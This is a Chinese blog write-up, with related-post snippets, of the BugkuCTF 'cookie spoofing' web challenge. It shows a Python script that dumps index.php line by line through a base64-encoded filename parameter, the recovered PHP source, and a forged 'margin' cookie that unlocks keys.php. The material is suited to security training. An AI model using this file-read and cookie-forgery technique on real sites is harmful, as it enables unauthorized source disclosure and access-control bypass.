Bugkuctf web cookie欺骗

最新推荐文章于 2024-03-12 22:42:04 发布
最新推荐文章于 2024-03-12 22:42:04 发布
阅读量735 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 安全大杂烩
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43271194/article/details/89892924
博客围绕URL参数展开,发现URL上有类似base64编码内容并进行解码。通过对URL中filename和line参数的测试,参考他人思路,利用PHP解析逻辑,构造让filename读取自身的方式获取代码,还给出手动输入行号和用Python脚本两种获取代码的方式,并介绍了相关代码函数。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目链接

又有新东西啦

打开
在这里插入图片描述发现没啥用,查看源码也没什么

注意到URL上有一串类似base64编码的东西

解码
在这里插入图片描述
习惯性访问一下

在这里插入图片描述在这里插入图片描述那下面又该咋办呢???
URL里filename有参数,line没有参数
要不试一试价格参数?

line=1,啥都没有

注意到filename 的参数是base64编码后的

那再把1,2,3编码一波试试?

在这里插入图片描述又回去了啥都没有。。。

懵逼中。。。

在这里插入图片描述看了一下别人的writeup
注意到一个逻辑

php解析的时候 line 表示的是行号,filename是对于文件内容的读取,所以,直接构造一个逻辑矛盾,让filename去读自己即读index.php

还是要编码一下,毕竟filename都是编码了的

于是
在这里插入图片描述显然随着line行数变化,代码也出来了

这里有两种方式

第一种自己一次输入行号,然后copy出来

第二种是用python写个小脚本出来,就个人而言,选择第二种好一些吧

附上脚本

import requests
a=30
for i in range(a):
    url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw" 
    r=requests.get(url)
    print (r.text)

找到的代码

<?php
 
error_reporting(0);
 
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
 
$line=isset($_GET['line'])?intval($_GET['line']):0;
 
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
 
$file_list = array(
 
'0' =>'keys.txt',
 
'1' =>'index.php',
 
);
 
 
 
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){      
 
$file_list[2]='keys.php';
 
}
//看看这个地方!!!
 
 
 
if(in_array($file, $file_list)){
 
$fa = file($file);
 
echo $fa[$line];
 
}
 
?>

代码相关函数
?是条件语句
intval()
函数用于获取变量的整数值
header()
函数向客户端发送原始的 HTTP 报头。这里是跳转到一个新地址
array()
创建一个新数组
file()
把文件读入数组

接下来构造
filename=a2V5cy5waHA=
Cookie:margin=margin
就行啦
在这里插入图片描述

BugkuCTF-WEBcookie欺骗
am_03的博客
08-29 1193
知识点 isset: 检测变量是否设置,并且不是 NULL $_GET:收集来自 method=“get” 的表单里的值 intval() 函数用于获取变量的整数值。 in_array() 函数搜索数组里是否存在指定的值。 举例: <?php $am = array("Bill", "Steve", "trump", "David"); if (in_array("trump", $am)) { echo "匹配已找到"; } else { echo "匹配未找到"; } ?&
bugku CTF Web-20-cookies欺骗
weixin_47387913的博客
04-14 419
Web-20-cookies欺骗 一、尝试 提交flag的时候又忘记截图了,直接描述一下吧。 给出的网站进入后是一串不知道什么东西的代码,也不像什么加密,直接使用,但是网站进入后网址后面出现了一串编码,base64解密。 发现是读取的keys.txt里面的内容,改变line的值为1或0均相同,改变为2时无内容出现,说明无第二行内容。 直接尝试读取index.php里的内容 与keys.txt相同,把filename改为index.php,同样base64...
BugkuCTFWeb--cookies欺骗
VZZmieshenquan的博客
02-10 1664
Description: http://123.206.87.240:8002/web11/ 答案格式:KEY{xxxxxxxx} Solution: 打开网页,发现URL有一段Base64URL解码得keys.txt,试了一些方法之后,将index.php也Base64编码了一下,尝试用filename读取index.php发现出现了php的第一行,所以这里我选择用python遍历ind...
bugkuctf-web-cookies欺骗
Ahuuua的博客
12-17 473
看那一堆重复的串什么也不是 记得看url,url里也可能隐藏信息 a2V5cy50eHQ= 像base64 转化后:keys.txt 说明一进来访问的是web11/index.php?line=&filename=keys.txt 改一下line=&filename=index.php 转base64 line=&filename=aW5kZXgucGhw 查看源代码得到第0行 view-source:http://123.206.87.240:800...
bugku-web-cookie欺骗
a3uRa的一个窝
08-14 984
url上有base64,解密得到filename=key.txt index.php用base64加密 同样方法,把加密后的字符串,放到filename的参数中,回车 查看源代码,发现 import requests s=requests.session() url='http://120.24.86.145:8002/web11/index.php' for i in range(0...
bugkuctf cookies欺骗wp
wuerror的博客
08-05 847
     老实说这道题有点绕,也可能是我比较菜。点开题目链接发现URL是这样的:"http://120.24.86.145:8002/web11/index.php?line=&amp;filename=a2V5cy50eHQ="          然后对filename进行base64解码,发现是keys.txt,诶有点莫名其妙,看一看别人的wp,把keys.txt换成index.php的ba...
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 7054
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 2221
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
cookie欺骗bugkuctf
最新发布
02-26
Cookie欺骗是指攻击者通过各种手段获取用户的敏感Cookie信息,并利用这些信息冒充合法用户访问受保护的Web应用。当COOKIE的HTTPOnly flag没有设置时,对于很多只依赖于cookie验证的网站来说存在较大风险[^1]。 ####...
BugkuCTF_Web——“秋名山老司机”、“速度要快”、“cookies欺骗
Ho1aAs‘s Blog
10-11 1188
文章目录一、“秋名山老司机”二、“速度要快”三、“cookies欺骗”完 一、“秋名山老司机” 开启环境,提示要在两秒钟计算结果 多次刷新发现每次的值不一样,并且知道了答案要通过赋值给value然后post上去 想到可以通过获取网页源代码使用eval()执行算式 编写以下python脚本 #requests实现请求,bs4获取标签内容 import requests,bs4 url = 'http://123.206.87.240:8002/qiumingshan/' #由于每次刷新后算式会不同,需要
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
bugku--cookie欺骗
YenKoc的博客
11-30 359
打开题目一看,是一串的东西,再看了一下filename发现不对劲了,明显是base64编码,拿去解码一下, 发现是这个,说明是filename,是需要解析的哪个文件名,把index.php编码一下,试试, 说明line需要去操作的,才可以把index.php给弄出来.直接上脚本 顺着代码意思,加入cookie就完事了。 ...
cookie欺骗(bugku)
hhh
09-06 2534
利用cookie值进行攻击; 完全没有一点经验,看到这个提示,我唯一能想到的就是用burpsuite抓包后修改一下cookie值,也许会有些什么东西;可是抓包后完全无从下手…… 然后有没有发现这道题的url跟其他的有些不一样呢?后面有一串很奇怪的参数,这熟悉的“=”,应该是base64编码,拿去解码一下:原来是&amp;fillename=key.txt; 另外url里还有一个参数:line...
BugkuCTFcookies欺骗web
s0il的博客
04-03 2728
题目描述: 点开链接,给了一串字符,这里只是一部分: rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaiheg Burp抓包,发现没什么效果: 思路 但,包里面的 GET /web11/ind...
BugKuCTF中套路满满的题-------Cookie欺骗
qq_42133828的博客
12-19 2450
这一题,首先看题目,Cookie欺骗,那么什么是Cookie欺骗呢?      看了网上的一些博客后,我想可以总结一句话就是: 你在火狐成功登陆了一个账号,并且把session_id记录下来,转而去其他浏览器登陆此账号,但此时的登陆不需要密码和账号,只需要把Session_id传给服务器,便可成功登陆  好了,话不多说,直接上。。。      首先,界面给出的是一串字符,当我想并没有什么用...
BUGKU-WEB cookies
天泽岁月
03-12 1600
BUGKU-WEB cookie欺骗
bugku web cookies欺骗
weixin_43928140的博客
05-20 777
记录菜鸡生活的第十二天 首先打开题目时一串字符串了 开始没啥想法,但是注意到了后面的url然后拿去解密,发现是keys.txt,放上去试一下 发现没有内容了,然后再思考一下,看这个url里面?后面有两个参数,一个line一个filename,然后filename后面是用的base64编码格式,就感觉filename传递的就是 base64密文格式,然后u传给后台的base64.decode()...
BugkuCTF web20_cookies欺骗 writeup
Mitchell_Donovan的博客
01-14 601
web20_cookies欺骗 原题链接 key:python脚本+修改cookies+base64加密访问 ①题目环境里显示一大长串神秘英文???? 查看源码后没有线索 但是观察URL发现参数filename的值经过了base64加密 拿去解密,结果是keys.txt ②大胆猜想,或许能得到源码 于是尝试修改参数filename=index.php 值得注意的是,此处index.php要用base64加密为aW5kZXgucGhw 回车发现啥也没有。。。 这才发现原来UR
Bugku:web cookies欺骗
qq_26961571的博客
07-10 339
​ 打开这道题。 发现全是一堆乱码!!马上打开源代码进行查看。 也是一堆乱码!!!一点头绪没有。 直到发现了网页的链接有问题,比普通的网页多出来了line,filename??? 哦吼,所以这里有猫腻。 用base64解码之后发现filename=keys.txt 尝试使用index.php看看有没有源代码,但是依然要用base64加密index.php才可以打开。 打开之后发现一片空白,后来在line=后面添加数字之后就出现了源...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值